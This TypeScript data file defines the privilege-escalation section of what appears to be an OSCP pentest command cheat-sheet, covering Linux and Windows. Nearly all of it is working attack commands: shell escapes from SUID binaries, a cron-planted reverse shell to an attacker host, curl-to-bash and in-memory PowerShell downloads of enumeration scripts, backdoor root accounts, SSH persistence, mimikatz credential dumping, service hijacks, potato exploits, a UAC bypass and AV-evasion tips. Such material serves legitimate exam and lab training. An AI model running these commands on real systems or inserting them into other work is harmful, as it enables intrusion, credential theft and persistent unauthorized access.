import { Section } from "./types";

export const privescSection: Section = {
  id: "privesc",
  title: "Privilege Escalation",
  slug: "privesc",
  groups: [
    {
      title: "Linux Quick Wins",
      subtitle: "Run first — these catch 80% of OSCP Linux privesc paths in under 2 minutes.",
      commands: [
        { id: "pri-1", cmd: "sudo -l", description: "Start here on every Linux box — sudo misconfigs are the #1 OSCP privesc path.", tip: "Any (NOPASSWD) entry is game. Cross-reference with GTFOBins immediately.", tags: ["linux"] },
        { id: "pri-2", cmd: "find / -perm -4000 -type f 2>/dev/null", description: "Find SUID binaries — any unexpected one is a potential root shell via GTFOBins.", tip: "Unusual hits: /usr/bin/python3, /usr/bin/nmap, /usr/bin/find, /usr/bin/vim", tags: ["linux"] },
        { id: "pri-3", cmd: "find / -perm -2000 -type f 2>/dev/null", description: "Find SGID binaries — less common than SUID but worth reviewing.", tags: ["linux"] },
        { id: "pri-4", cmd: "getcap -r / 2>/dev/null", description: "Capabilities like cap_setuid+ep on python or perl == instant root shell via GTFOBins.", tip: "cap_setuid+ep on any interpreter → immediate privesc.", tags: ["linux"] },
        { id: "pri-5", cmd: "find / -writable -type f -not -path '/proc/*' 2>/dev/null", description: "World-writable files outside /proc — writable scripts called by root crons or services.", tags: ["linux"] },
        { id: "pri-6", cmd: "uname -a && cat /etc/os-release", description: "Check kernel version for known CVEs (e.g., DirtyPipe ≤5.16, DirtyCOW ≤4.4).", tip: "Feed output to linux-exploit-suggester for quick CVE mapping.", tags: ["linux"] },
        { id: "pri-6a", cmd: "id && groups && whoami", description: "Look for membership in docker, lxd, disk, sudo, or adm groups — all are privesc paths.", tags: ["linux"] },
        { id: "pri-6b", cmd: "cat /etc/crontab && ls -la /etc/cron.*", description: "Writable scripts called from root cron jobs — overwrite the script to get a root shell.", tip: "Also check /var/spool/cron and run pspy64 to catch unlisted cron execution.", tags: ["linux"] },
        { id: "pri-6c", cmd: "find / -name '*.conf' -o -name '*.bak' -o -name '*.log' 2>/dev/null | grep -v proc", description: "Configs and backups often contain hardcoded DB passwords, API keys, or SSH private keys.", tags: ["linux"] },
        { id: "pri-6d", cmd: "cat /etc/passwd | grep -v nologin | grep -v false", description: "Interactive accounts that can log in — useful for password reuse after credential finding.", tags: ["linux"] },
        { id: "pri-6e", cmd: "env | sort", description: "Check for secrets injected via environment — API keys, passwords, tokens in deploy scripts.", tags: ["linux"] },
        { id: "pri-6f", cmd: "ss -tlnp", description: "Internal services only reachable from localhost — tunnel them back via SSH for further exploitation.", tags: ["linux"] },
        { id: "pri-6g", cmd: "cat /etc/hosts && arp -n", description: "Identify other internal hosts for lateral movement — ARP cache shows recently communicated hosts.", tags: ["linux"] },
      ],
    },
    {
      title: "Linux GTFOBins",
      subtitle: "Use when sudo -l or SUID scan reveals a known binary — cross-check at gtfobins.github.io.",
      commands: [
        { id: "pri-7", cmd: "find . -exec /bin/sh \\; -quit", description: "Use when 'find' has SUID bit or sudo NOPASSWD — immediately drops into root shell.", tags: ["linux"] },
        { id: "pri-8", cmd: "vim -c ':!/bin/sh'", description: "Use when vim has SUID or sudo permission — type ':!/bin/sh' inside to escape.", tip: "Also works with vi and nvim.", tags: ["linux"] },
        { id: "pri-9", cmd: "python3 -c 'import os; os.system(\"/bin/sh\")'", description: "Use when python3/python has SUID or sudo NOPASSWD — trivial one-liner shell escape.", tags: ["linux"] },
        { id: "pri-10", cmd: "awk 'BEGIN {system(\"/bin/sh\")}'", description: "Use when awk has SUID or sudo — spawns shell as the binary's owner.", tags: ["linux"] },
        { id: "pri-11", cmd: "less /etc/profile", description: "Use when less has SUID/sudo — once open, type '!sh' to break out to a shell.", tip: "Press '!' followed by 'sh' then Enter while less is open.", tags: ["linux"] },
        { id: "pri-12", cmd: "tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh", description: "Use when tar has SUID or appears in writable cron scripts — executes shell via checkpoint.", tags: ["linux"] },
        { id: "pri-12a", cmd: "perl -e 'exec \"/bin/sh\";'", description: "Use when perl has SUID or sudo NOPASSWD — immediate shell via exec().", tags: ["linux"] },
        { id: "pri-12b", cmd: "bash -p", description: "Use when bash has SUID — '-p' preserves EUID so shell runs as the file owner (often root).", tip: "Without -p, bash drops privileges. This is the key flag.", tags: ["linux"] },
        { id: "pri-12c", cmd: "nmap --interactive", description: "Only works on very old nmap versions (<5.21). Type '!sh' at the interactive prompt.", tags: ["linux"] },
        { id: "pri-12d", cmd: "env /bin/sh", description: "Use when env has SUID — passes execution through to /bin/sh as root.", tags: ["linux"] },
      ],
    },
    {
      title: "Linux Exploitation Techniques",
      subtitle: "Use after finding a specific misconfiguration — cron abuse, PATH hijack, writable /etc/passwd, or group membership.",
      commands: [
        { id: "pri-13", cmd: "echo '* * * * * root /bin/bash -c \"bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1\"' | sudo tee /etc/crontab", description: "Use when /etc/crontab is world-writable — adds root reverse shell that fires every minute.", tip: "Start your listener before writing the cron. Wait up to 60 seconds.", tags: ["linux"], hasVars: true },
        { id: "pri-14", cmd: "echo '/bin/bash' > /tmp/ls && chmod +x /tmp/ls && export PATH=/tmp:$PATH", description: "Use when a root-owned script calls 'ls' or another common binary without an absolute path.", tip: "Use pspy64 to catch exactly which binaries a root script calls.", tags: ["linux"] },
        { id: "pri-15", cmd: "docker run -v /:/mnt --rm -it alpine chroot /mnt sh", description: "Use when current user is in the 'docker' group — mounts full filesystem and chroots to root.", tip: "Check 'id' for docker group. This is an instant root on most systems.", tags: ["linux"] },
        { id: "pri-15a", cmd: "lxc image import ./alpine.tar.gz --alias alpine && lxc init alpine pwned -c security.privileged=true && lxc config device add pwned host-root disk source=/ path=/mnt/root recursive=true && lxc start pwned && lxc exec pwned /bin/sh", description: "Use when current user is in the 'lxd' group — mounts host filesystem inside a privileged container.", tip: "Import a minimal Alpine image from your attacker machine first via python3 -m http.server.", tags: ["linux"] },
        { id: "pri-16", cmd: "gcc -fPIC -shared -o /tmp/shell.so shell.c -nostartfiles && sudo LD_PRELOAD=/tmp/shell.so /usr/bin/vim", description: "Use when sudo -l shows 'env_keep+=LD_PRELOAD' — injects a shared library that spawns root shell.", tip: "The sudo entry must explicitly preserve LD_PRELOAD. Most hardened systems strip it.", tags: ["linux"] },
        { id: "pri-16a", cmd: "openssl passwd -6 -salt xyz newpassword", description: "Generate a valid SHA-512 hash to insert a backdoor root account into /etc/passwd or /etc/shadow.", tags: ["linux"] },
        { id: "pri-16b", cmd: "echo 'root2:HASH:0:0:root:/root:/bin/bash' >> /etc/passwd", description: "Use when /etc/passwd is world-writable — add a root-level account with a known password.", tip: "Replace HASH with output from openssl passwd. UID/GID 0 = root.", tags: ["linux"] },
        { id: "pri-16c", cmd: "ssh-keygen -t rsa && cat ~/.ssh/id_rsa.pub | ssh {USER}@{RHOST} 'cat >> ~/.ssh/authorized_keys'", description: "After getting shell — establish persistent SSH access with key auth before you lose the session.", tags: ["linux"], hasVars: true },
      ],
    },
    {
      title: "Linux Automated",
      subtitle: "Run LinPEAS early — it covers everything above and highlights critical findings in red.",
      commands: [
        { id: "pri-17", cmd: "curl -s http://{LHOST}/linpeas.sh | bash", description: "Fastest way to run LinPEAS — no disk write. Requires curl and outbound HTTP from target.", tip: "Pipe to 'tee /tmp/lp.out' to save results if the terminal scrolls too fast.", tags: ["linux"], hasVars: true },
        { id: "pri-17a", cmd: "wget -q http://{LHOST}/linpeas.sh -O /tmp/lp.sh && chmod +x /tmp/lp.sh && /tmp/lp.sh 2>/dev/null | tee /tmp/lp.out", description: "Use when curl is unavailable — wget alternative that saves output for review.", tags: ["linux"], hasVars: true },
        { id: "pri-17b", cmd: "/tmp/linpeas.sh -a 2>/dev/null | tee /tmp/lp.out", description: "Run LinPEAS with -a (all checks, more thorough) on a pre-uploaded binary — good for air-gapped targets.", tip: "Upload via SMB/SCP first. -a adds extra checks but is slower; skip on time-constrained boxes.", tags: ["linux"] },
        { id: "pri-17c", cmd: "/tmp/linpeas.sh -q -L 2>/dev/null", description: "Quiet + light mode — minimal output for noisy or constrained shells.", tip: "-q suppresses headers, -L runs only the fastest checks.", tags: ["linux"] },
        { id: "pri-18", cmd: "curl -s http://{LHOST}/lse.sh | bash -s -- -l 1", description: "Lighter alternative to LinPEAS — good for slow targets or when you need a quick overview first.", tags: ["linux"], hasVars: true },
        { id: "pri-19", cmd: "pspy64", description: "Watch for cron jobs, scripts, and processes triggered by other users — reveals hidden privesc paths.", tip: "Run for 1-2 minutes and look for root-owned processes that call writable scripts.", tags: ["linux"] },
        { id: "pri-19a", cmd: "linux-exploit-suggester.sh", description: "Map current kernel version to public CVEs — look for DirtyPipe, DirtyCOW, PwnKit.", tip: "Get from: https://github.com/mzet-/linux-exploit-suggester. Pipe uname -a output for offline lookups.", tags: ["linux"] },
        { id: "pri-19b", cmd: "linpeas.sh | grep -E '95%|99%|RED'", description: "Filter LinPEAS output to only red-flagged (95%+ confidence) findings — fast triage of a long output.", tags: ["linux"] },
      ],
    },
    {
      title: "Windows Token Impersonation",
      subtitle: "Use when whoami /priv shows SeImpersonatePrivilege — common on IIS, SQL Server, and service account shells.",
      commands: [
        { id: "pri-20", cmd: "whoami /priv", description: "Look for SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege — both lead to SYSTEM via potato attacks.", tip: "SeImpersonate = run a potato exploit. SeBackup/SeRestore = dump SAM hives.", tags: ["windows"] },
        { id: "pri-20a", cmd: "whoami /groups", description: "Membership in Administrators, Backup Operators, Remote Management Users, or Server Operators groups are direct privesc paths.", tip: "Backup Operators can read SAM/SYSTEM hives. Server Operators can modify services on the DC.", tags: ["windows"] },
        { id: "pri-20b", cmd: "net localgroup administrators", description: "List local admins — confirm your user was added after privesc, or pick which account to target.", tags: ["windows"] },
        { id: "pri-25", cmd: "PrintSpoofer64.exe -i -c cmd", description: "Use when SeImpersonatePrivilege is enabled on Windows Server 2019 or Windows 10.", tip: "Run from a writable directory. Use 'cmd /c whoami' first to confirm SYSTEM.", tags: ["windows"] },
        { id: "pri-26", cmd: "GodPotato-NET4.exe -cmd cmd", description: "Most reliable potato for modern systems — works on Windows 10/11 and Server 2022 with .NET 4.", tip: "Choose GodPotato for anything after 2019. JuicyPotato for older targets.", tags: ["windows"] },
        { id: "pri-27", cmd: "JuicyPotatoNG.exe -t * -p cmd.exe -a '/c whoami'", description: "Use on Windows Server 2016/2019 when SeImpersonatePrivilege is present.", tip: "Original JuicyPotato targets older systems. NG variant is patched for modern targets.", tags: ["windows"] },
        { id: "pri-27a", cmd: "SweetPotato.exe -a 'whoami'", description: "Alternative potato that triggers from a service account — no CLSID hunting required.", tags: ["windows"] },
        { id: "pri-27b", cmd: "RottenPotatoNG.exe -c \"{4991D34B-80A1-4291-83B6-3328366B9097}\" -l 9999 -e cmd.exe", description: "Legacy token impersonation for older Windows Server 2008/2012 targets.", tags: ["windows"] },
        { id: "pri-27c", cmd: "runas /netonly /user:{DOMAIN}\\{USER} cmd.exe", description: "Run cmd under another user's network credentials — useful for password-only access (no token).", tip: "Prompts for the password. The new shell uses those creds for SMB/LDAP/etc. but keeps your local token.", tags: ["windows", "ad"], hasVars: true },
        { id: "pri-27d", cmd: "runas /savecred /user:{DOMAIN}\\Administrator cmd.exe", description: "Run as a stored credential found via cmdkey /list — no password prompt.", tip: "Use after spotting a cached cred. Pair with cmdkey /list in Credential Dumping.", tags: ["windows"], hasVars: true },
      ],
    },
    {
      title: "Windows Service Exploitation",
      subtitle: "Use when automated tools flag unquoted paths, weak ACLs on service binaries, or AlwaysInstallElevated.",
      commands: [
        { id: "pri-28", cmd: "wmic service where 'pathname like \"% %\" and not pathname like \"\\\"%\\\"\"' get name,pathname", description: "Find unquoted service paths with spaces — Windows will try each prefix as an executable.", tip: "Create a binary at the unquoted location (e.g., C:\\Program.exe) and restart the service.", tags: ["windows"] },
        { id: "pri-29", cmd: "icacls \"C:\\Program Files\\Some Service\"", description: "Check for (M) or (F) permissions for low-priv users on service directories — allows DLL/binary planting.", tags: ["windows"] },
        { id: "pri-30", cmd: "reg query HKCU\\Software\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated", description: "First half of AlwaysInstallElevated check — both HKCU and HKLM must be set to 1 to exploit.", tip: "If both return 0x1, craft a malicious .msi with msfvenom -p windows/adduser EXITFUNC=process -f msi", tags: ["windows"] },
        { id: "pri-30a", cmd: "reg query HKLM\\Software\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated", description: "Second half of AlwaysInstallElevated check — exploit only when both registry keys are 1.", tags: ["windows"] },
        { id: "pri-30b", cmd: "accesschk.exe /accepteula -uwcqv \"Authenticated Users\" *", description: "Find services that Authenticated Users can modify — change binary path to attacker payload.", tip: "accesschk must be run from a directory without a space in the path to work correctly.", tags: ["windows"] },
        { id: "pri-30c", cmd: "sc config {SERVICE_NAME} binPath= \"cmd /c net localgroup administrators {USER} /add\"", description: "Use when you have write permission on a service — hijack binPath to add yourself to admins.", tip: "Follow with: sc stop {SERVICE_NAME} && sc start {SERVICE_NAME}", tags: ["windows"], hasVars: true },
        { id: "pri-30d", cmd: "icacls C:\\ /t /c | findstr /i \"(F) (M) Everyone Authenticated Users\"", description: "Find world-writable folders — potential DLL hijack locations for services or scheduled tasks.", tags: ["windows"] },
      ],
    },
    {
      title: "Windows Credential Dumping",
      subtitle: "Use after gaining admin — dump LSASS for plaintext passwords, or save SAM hives for offline cracking.",
      commands: [
        { id: "pri-cd-1", cmd: "mimikatz.exe \"privilege::debug\" \"sekurlsa::logonpasswords\" \"exit\"", description: "Dump plaintext passwords and NTLM hashes from LSASS — works when WDigest is enabled or on older OS.", tip: "WDigest is disabled by default since Windows 8.1. Still gets NTLM hashes for PtH.", tags: ["windows"] },
        { id: "pri-cd-2", cmd: "mimikatz.exe \"privilege::debug\" \"lsadump::sam\" \"exit\"", description: "Dump local SAM database hashes — useful for cracking or pass-the-hash against local accounts.", tags: ["windows"] },
        { id: "pri-cd-3", cmd: "mimikatz.exe \"privilege::debug\" \"lsadump::lsa /patch\" \"exit\"", description: "Dump LSA secrets — may contain service account passwords, domain cached credentials, and machine account hashes.", tags: ["windows"] },
        { id: "pri-cd-4", cmd: "reg save HKLM\\SAM C:\\Windows\\Temp\\SAM && reg save HKLM\\SYSTEM C:\\Windows\\Temp\\SYSTEM", description: "Save registry hives without touching LSASS — stealthier alternative to mimikatz, works offline.", tip: "Transfer SAM + SYSTEM to attacker machine and run: secretsdump.py -sam SAM -system SYSTEM LOCAL", tags: ["windows"] },
        { id: "pri-cd-5", cmd: "secretsdump.py -sam SAM -system SYSTEM LOCAL", description: "Offline SAM/SYSTEM hive dump — run on attacker machine after transferring the hive files.", tip: "For remote dumps with creds, see secretsdump in the AD section (ad-5).", tags: ["windows"] },
        { id: "pri-cd-7", cmd: "cmdkey /list", description: "List cached Windows credentials — sometimes contains domain accounts or runas-stored passwords.", tip: "Use 'runas /savecred /user:DOMAIN\\user cmd' if a stored credential appears (see Token Impersonation).", tags: ["windows"] },
        { id: "pri-cd-8", cmd: "dir /s /b *pass* *cred* *vnc* *.kdbx 2>nul", description: "Find credential-related files by name — KeePass databases, VNC configs, or saved passwords.", tags: ["windows"] },
        { id: "pri-cd-9", cmd: "reg query HKLM\\SYSTEM\\CurrentControlSet\\Services\\SNMP /v CommunityName 2>nul", description: "SNMP community string stored in registry — reuse as password on other services.", tags: ["windows"] },
      ],
    },
    {
      title: "Windows Automated",
      subtitle: "Run winPEAS first — it covers all manual checks above and colour-codes the most critical findings.",
      commands: [
        { id: "pri-31", cmd: ".\\winPEASx64.exe", description: "Most comprehensive Windows privesc enumeration — run and read the RED output first.", tip: "Suppress AV detection with: winPEASx64.exe quiet. Review ALL token privilege findings.", tags: ["windows"] },
        { id: "pri-31a", cmd: ".\\winPEASx64.exe systeminfo userinfo", description: "Run only the fast checks — useful when winPEAS is slow or AV is interfering.", tip: "Other quick modules: filesinfo, processinfo, servicesinfo, applicationsinfo.", tags: ["windows"] },
        { id: "pri-31b", cmd: "powershell -ep bypass -c \"IEX(New-Object Net.WebClient).DownloadString('http://{LHOST}/winPEAS.ps1')\"", description: "PowerShell port of winPEAS — runs in memory, no disk write. Use when the .exe is AV-flagged.", tags: ["windows"], hasVars: true },
        { id: "pri-32", cmd: "powershell -ep bypass -c \"Import-Module .\\PowerUp.ps1; Invoke-AllChecks\"", description: "PowerUp finds service misconfigs, AlwaysInstallElevated, and weak registry permissions.", tags: ["windows"] },
        { id: "pri-33", cmd: ".\\Seatbelt.exe all", description: "Host triage tool — checks system config, credentials, and security posture. Good for scoping.", tip: "For quick cred hunting: Seatbelt.exe WindowsCredentialFiles CredEnum", tags: ["windows"] },
        { id: "pri-33a", cmd: "wesng --muc-lookup systeminfo.txt", description: "Map systeminfo patch level to unpatched CVEs — identify kernel/driver exploits for the exact version.", tags: ["windows"] },
      ],
    },
    {
      title: "Windows UAC Bypass",
      subtitle: "Use when you have a medium-integrity shell and need high-integrity without a password.",
      commands: [
        { id: "pri-36", cmd: "reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA", description: "Confirm UAC is enabled before spending time on bypass techniques — 0x1 means UAC is on.", tags: ["windows"] },
        { id: "pri-36a", cmd: "reg add HKCU\\Software\\Classes\\ms-settings\\Shell\\Open\\command /d \"cmd /c start cmd\" /f && reg add HKCU\\Software\\Classes\\ms-settings\\Shell\\Open\\command /v DelegateExecute /f && fodhelper.exe", description: "Fodhelper UAC bypass — abuses ms-settings COM handler in HKCU. Works on Windows 10.", tip: "Replace 'cmd /c start cmd' with your payload path. Cleans up automatically when fodhelper exits.", tags: ["windows"] },
        { id: "pri-36b", cmd: "eventvwr.msc", description: "Event Viewer UAC bypass — set HKCU\\Software\\Classes\\mscfile\\shell\\open\\command to your payload first.", tags: ["windows"] },
      ],
    },
  ],
};
